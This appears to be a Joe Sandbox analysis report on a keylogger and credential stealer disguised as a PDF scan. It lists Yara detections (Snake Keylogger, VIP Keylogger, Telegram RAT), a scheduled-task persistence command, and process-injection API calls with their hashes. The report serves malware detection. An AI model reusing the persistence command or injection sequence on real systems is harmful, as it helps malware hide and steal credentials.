Path:	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"
Imagebase:	0x300000
File size:	840'712 bytes
MD5 hash:	D8DAEB11E006370F3B454DF74C382CED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:17:08
Start date:	25/10/2024
Path:	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"
Imagebase:	0xd30000
File size:	840'712 bytes
MD5 hash:	D8DAEB11E006370F3B454DF74C382CED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3882761665.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	03:17:08
Start date:	25/10/2024
Path:	C:\Users\user\AppData\Roaming\QeSBxb.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\QeSBxb.exe
Imagebase:	0xae0000
File size:	840'712 bytes
MD5 hash:	D8DAEB11E006370F3B454DF74C382CED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:17:10
Start date:	25/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:17:12
Start date:	25/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp"
Imagebase:	0xa50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:17:12
Start date:	25/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:17:12
Start date:	25/10/2024
Path:	C:\Users\user\AppData\Roaming\QeSBxb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\QeSBxb.exe"
Imagebase:	0x950000
File size:	840'712 bytes
MD5 hash:	D8DAEB11E006370F3B454DF74C382CED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000D.00000002.3879340417.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.9%
Total number of Nodes:	159
Total number of Limit Nodes:	4

Executed Functions

Function 08CD6B84 Relevance: 1.6, APIs: 1, Instructions: 58
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 08CDABE7

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 9dcdd2e9e00f15084015ce3ccf1f8b3beec49703f96e579371938ecacceacba2
Instruction ID: dbe0947053e7c5bc44a730b5c37241c1f553b15b8ea60646a73a34262f89ba2b
Opcode Fuzzy Hash: 9dcdd2e9e00f15084015ce3ccf1f8b3beec49703f96e579371938ecacceacba2
Instruction Fuzzy Hash: FA21FEB5900359AFCB10DF9AD884ADEBBF5FB48310F10842AEA18A7210C374A944CFA0

Function 08CDAB60 Relevance: 1.6, APIs: 1, Instructions: 58
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 08CDABE7

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 292fb27bf326f072c922c0c22b38d08a4bdc59d59b29b22f3c8d1b52d1ed83f6
Instruction ID: e0e09366d0da936a400b6b4bc1a99e0c1f7a6fa82c8da371ceb95c90fe07bc0d
Opcode Fuzzy Hash: 292fb27bf326f072c922c0c22b38d08a4bdc59d59b29b22f3c8d1b52d1ed83f6
Instruction Fuzzy Hash: EC21EFB6901359DFCB10DF9AD884ADEFBF5FB48320F10852AE918A7250C375A554CFA0

Function 08CD7EF0 Relevance: .5, Instructions: 512COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 025ff92895fce97862fb7754936627702b00cfebec4b0d2244042f64c9042f55
Instruction ID: 66b81fde737120b16fadbf51d5c3a3b44312e4b931cb9f9a7a36fcf324928a6a
Opcode Fuzzy Hash: 025ff92895fce97862fb7754936627702b00cfebec4b0d2244042f64c9042f55
Instruction Fuzzy Hash: 60429074E01218CFDB24DFA9C984B9DBBB2FF48311F1485A9E919AB355D730AA81CF50

Function 08CD6C29 Relevance: .5, Instructions: 484COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 740e0f1dfb6d410d734e5d219b35d09b5b208a23d8631f367de43f73e34b3413
Instruction ID: f3ba35118782c792e03de9454a81fb29215110e492970dc7b96e88825c8d35b1
Opcode Fuzzy Hash: 740e0f1dfb6d410d734e5d219b35d09b5b208a23d8631f367de43f73e34b3413
Instruction Fuzzy Hash: 7732A374D01219CFEB64DF69C684A8EFBB2FF58212F55C199D548AB211CB30D986CFA0

Function 08CD1218 Relevance: .4, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2b9d18041c98f509e14390fd057d8c1c0cc814128a817b8c4df09e7c10f7da2
Instruction ID: 72db0e131764960a11fc45c97d71e3921ea18f4e3aacfbdbb9033442eb81d395
Opcode Fuzzy Hash: b2b9d18041c98f509e14390fd057d8c1c0cc814128a817b8c4df09e7c10f7da2
Instruction Fuzzy Hash: 69022B70A00219CFDB14EFA9D8547AEBBF6BF88701F248559E506AB351EF34D942CB90

Function 091AB7F8 Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e581df251800cd0eefd2696ca5858b259faca5029eab232beb82af751ad0f9a1
Instruction ID: 48606a5b687c7b9e81259c453b191e5a3bb83d1e43d1f16949619f19a8293ada
Opcode Fuzzy Hash: e581df251800cd0eefd2696ca5858b259faca5029eab232beb82af751ad0f9a1
Instruction Fuzzy Hash: 08E1D879B053449BDB29EF79C450BAEB7FAAF89304F10842DE1469B294CB38ED41CB50

Function 08CD1980 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8241c801be3b6bdff3c82f10ca94a4256996d46c15a8c4997135dfe68a1f5901
Instruction ID: 7d8153ba4bb4013f6b1c281001e228da69d6e0a1b976fff4a02f788e6318607c
Opcode Fuzzy Hash: 8241c801be3b6bdff3c82f10ca94a4256996d46c15a8c4997135dfe68a1f5901
Instruction Fuzzy Hash: 8DD13F70A00219DFCB15EFA9C984AADFBF2BF89341F19815AE505AB361D730ED42CB50

Function 08CDCEE0 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba821139fed63f1bee1f5f7e02a34b8a82e26c15963b445994d37d7b84a74bd
Instruction ID: adf0514d917234b9bb108ece8a0556b808c16baacf17be24da0270e3fd5fa232
Opcode Fuzzy Hash: 9ba821139fed63f1bee1f5f7e02a34b8a82e26c15963b445994d37d7b84a74bd
Instruction Fuzzy Hash: 72517F75D006199FDB08DFEAD8446EEFBB2FF88311F14812AE919BB254DB345A46CB40

Function 08CDCEDB Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f047707e249743b85b293969e93a24540b5e0f26033542ccf680fd6b48fd3e
Instruction ID: 5db33f195ef1eeef5e76738067ab25f5dda0277ec257345752d8fb0fdbebed40
Opcode Fuzzy Hash: 39f047707e249743b85b293969e93a24540b5e0f26033542ccf680fd6b48fd3e
Instruction Fuzzy Hash: 3B418271E006199BDB08DFEAD84469EFBF2AF88301F14C12AD519AB354EB345946CF40

Function 091A69CD Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 091A6C0E

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d6d4be3fe88203fc25d4b32f273b699c082002dc40bee1e84b48715a13c9a695
Instruction ID: 6e4ffa2c0a6c230fd9a70d8d21f91cd829a5a46bbcce651575f9c39ac499d3b0
Opcode Fuzzy Hash: d6d4be3fe88203fc25d4b32f273b699c082002dc40bee1e84b48715a13c9a695
Instruction Fuzzy Hash: 55A15975E00719CFDB20DF68C841BAEBBB2FF48314F188569E819A7280DB759985CF91

Function 091A69D8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 091A6C0E

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5a24100017de040be5b633ab4d7dd0b622194f8f439b414084e9a166ed095c2c
Instruction ID: 55c54fbd23c6c2f5f53b3e29d74e5c2c23c64b813ac6ae25aa17e1ad036b877d
Opcode Fuzzy Hash: 5a24100017de040be5b633ab4d7dd0b622194f8f439b414084e9a166ed095c2c
Instruction Fuzzy Hash: 9A915B75E00719CFDB20DF68C841B9EBBB2FF48714F188569E818A7280DB759985CF91

Function 03217A1C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 032190C1

Memory Dump Source

Source File: 00000001.00000002.1460113401.0000000003210000.00000040.00000800.00020000.00000000.sdmp, Offset: 03210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3210000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 403bb42a911d0fd5918e43d9a550e0a2a8519ba5550f703393e7b739b099bee3
Instruction ID: 21420f247f853aa63d19c10785192fbebec6181a271e0ab74c303adeb61f9edf
Opcode Fuzzy Hash: 403bb42a911d0fd5918e43d9a550e0a2a8519ba5550f703393e7b739b099bee3
Instruction Fuzzy Hash: 3D41E1B0D10719CFDB24DFA9C944B8EBBF1BF89704F20806AD508AB251DB756985CF90

Function 091A6749 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 091A67E0

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 940255956f35430e56f93f76ef19efb29f7e50e0513123648eb6d3a8a4117316
Instruction ID: c59fb18d38aca3798a441bcb9c4aa80e0a59bea9027aaad16fa3ce346871d682
Opcode Fuzzy Hash: 940255956f35430e56f93f76ef19efb29f7e50e0513123648eb6d3a8a4117316
Instruction Fuzzy Hash: 6E2148759103499FDB10DFA9C880BEEBBF1FF88310F14842EE959A7240C7789954DB60

Function 091A6750 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 091A67E0

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: dbaf8b37a5f4cefc7602da2440c2ad3fa11667ecfa42883cb4e42ff2704e7c58
Instruction ID: 4a37c19a3e0a45199a0ee04be82cbd730548cd635797089b36fef8f7efe3a4cb
Opcode Fuzzy Hash: dbaf8b37a5f4cefc7602da2440c2ad3fa11667ecfa42883cb4e42ff2704e7c58
Instruction Fuzzy Hash: 982125759103099FDF10DFAAC881BDEBBF5FF88310F14842AE958A7240C7789954DBA0

Function 091A65B0 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 091A6636

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 19fbfe6efecea9be56e3697ce890b49daf2ac035e9ce2142ca81cc1601ddc1e1
Instruction ID: c7022d27d68cbbb63dd760bedb4bf1b0c404c38d3482c0631f2657b261718a07
Opcode Fuzzy Hash: 19fbfe6efecea9be56e3697ce890b49daf2ac035e9ce2142ca81cc1601ddc1e1
Instruction Fuzzy Hash: CC216875D003098FDB14DFAAC4857EEBBF4AF88324F54842DD559A7241CB789945CFA0

Function 091A683C Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 091A68C0

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2347086d5684c67222abb1b680f29ff3ed9bc79dcbbfe036f88d85e50ec1f6fc
Instruction ID: 7d746e02ae23a0b745e1ec6fca943d34747839dd5330664eb78564575bd6e52f
Opcode Fuzzy Hash: 2347086d5684c67222abb1b680f29ff3ed9bc79dcbbfe036f88d85e50ec1f6fc
Instruction Fuzzy Hash: 0B212271D003499FDB10DFAAC881BEEBBF5BF88320F14882EE559A7240C7789944DB60

Function 091A6840 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 091A68C0

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d8d4766d77e722e4eadff9d6ec4a7dc637cd24f6844629e1bd66b0becf7e9024
Instruction ID: 6fe546aa5f103f62883200354fc5cea2259c1c733df9e437708066002fd91ee6
Opcode Fuzzy Hash: d8d4766d77e722e4eadff9d6ec4a7dc637cd24f6844629e1bd66b0becf7e9024
Instruction Fuzzy Hash: B9212871D003499FDB10DFAAC880BEEBBF5FF48320F148429E558A7240C7799944DBA0

Function 091A65B8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 091A6636

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a8429cdc6996cb1622c908d6a9d5737f2adb975a5d195d71ae034d8bf7e43f70
Instruction ID: cbfbee7079bbf01d263d8dc2751709c32c00e0433a7e2c742944894777320db1
Opcode Fuzzy Hash: a8429cdc6996cb1622c908d6a9d5737f2adb975a5d195d71ae034d8bf7e43f70
Instruction Fuzzy Hash: 5B213575D003098FDB10DFAAC4857EEBBF4AF88224F54842ED559A7240CB78A944CFA0

Function 091A6689 Relevance: 1.6, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 091A66FE

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a9435863b935d349c14b45637d11b4473a35ab68a0e1c0e5fedfd22fa3eff6b8
Instruction ID: 655f52523ada7b8b650b72579e6212378072785e6e2d1d9e12562a971ff922a5
Opcode Fuzzy Hash: a9435863b935d349c14b45637d11b4473a35ab68a0e1c0e5fedfd22fa3eff6b8
Instruction Fuzzy Hash: EC1159759003498FDF14DFAAC844BEEBBF5AF88320F14881DE519A7250C7759944DFA0

Function 091A6690 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 091A66FE

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 69a7a784a4c4fcee6379d8e34aa36a57b0e65df9108233caa3606b065bb0edc8
Instruction ID: 5b34161a853813b8ab2c9d86e6e4ed0c4fa0d6931c75731db5943a3d9dffd6e3
Opcode Fuzzy Hash: 69a7a784a4c4fcee6379d8e34aa36a57b0e65df9108233caa3606b065bb0edc8
Instruction Fuzzy Hash: BC1137759003499FDB10DFAAC844BDEBBF5EF88724F148819E519A7250CB75A940DFA0

Function 08CDBF39 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringW.KERNEL32(00000000), ref: 08CDBFB0

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 4f63d5a433048816a7b2ec036b62333ef415fe20aaaaea8d26e1e008df93cf91
Instruction ID: 852044f03d79ecc66624e2ff1d0eed85d8ee17042dd7405b3d1408c0b6320c99
Opcode Fuzzy Hash: 4f63d5a433048816a7b2ec036b62333ef415fe20aaaaea8d26e1e008df93cf91
Instruction Fuzzy Hash: 541144B5C0065A9FCB14DF9AD444B9EFBB0BF48320F11821AD858A7240C7746944CFA5

Function 08CDB264 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringW.KERNEL32(00000000), ref: 08CDBFB0

Memory Dump Source

Source File: 00000001.00000002.1465856845.0000000008CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8cd0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 0d9f708faf1109357c0c8fbc3c602c805f475e81d7b592fb7fbeaa6acc71ee4e
Instruction ID: 8b234a88bd26554c6f9dcad0ee92450e518b3a1b46d4c72b5922525ae89b3cf8
Opcode Fuzzy Hash: 0d9f708faf1109357c0c8fbc3c602c805f475e81d7b592fb7fbeaa6acc71ee4e
Instruction Fuzzy Hash: 521144B5C0460A9BCB14DF9AC444B9EFBF4FB48320F10811AE958A3340C778A940CFA5

Function 091A60C8 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 091A6132

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 49b49a5579a8742be4829968c368bf8eefa6c5743f6b0347e1037bca584c0731
Instruction ID: b9a6cc004f37603020a96747d33dce7bfa2ad4a9ca4129b668afddf518da6735
Opcode Fuzzy Hash: 49b49a5579a8742be4829968c368bf8eefa6c5743f6b0347e1037bca584c0731
Instruction Fuzzy Hash: E51146B59003498FDB24DFAAC4847EEFBF5EF88224F24881DD55AA7240CB799945CF90

Function 091A60D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 091A6132

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c002dd09d3ab65410eb32de15e25edd4ca4aa29d058fe24a4551c3f9f0d4b727
Instruction ID: b6c89cd3b41a988cc22a670abd1165866d8c5c9e41b5ba405d97affa8b4c1e2f
Opcode Fuzzy Hash: c002dd09d3ab65410eb32de15e25edd4ca4aa29d058fe24a4551c3f9f0d4b727
Instruction Fuzzy Hash: 781136B5D003498FDB24DFAAC84579EFBF5EF88624F248819D519A7240CB79A944CFA0

Function 091A5A14 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 091AAE7D

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3eb0ad42eaee4f2fb482e1f4e80413b855b1f39a71fd7dad5f9a684c9d48151b
Instruction ID: 48e9f7be5a3b4d29fb79b988269a0bd9ddc6172c811af7231ea68708ac12f892
Opcode Fuzzy Hash: 3eb0ad42eaee4f2fb482e1f4e80413b855b1f39a71fd7dad5f9a684c9d48151b
Instruction Fuzzy Hash: 5C1103B5900349DFDB20DF9AC984BDEFBF8EB48324F108419E918A7240D375A944CFA5

Function 091AAE19 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 091AAE7D

Memory Dump Source

Source File: 00000001.00000002.1466294641.00000000091A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_91a0000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
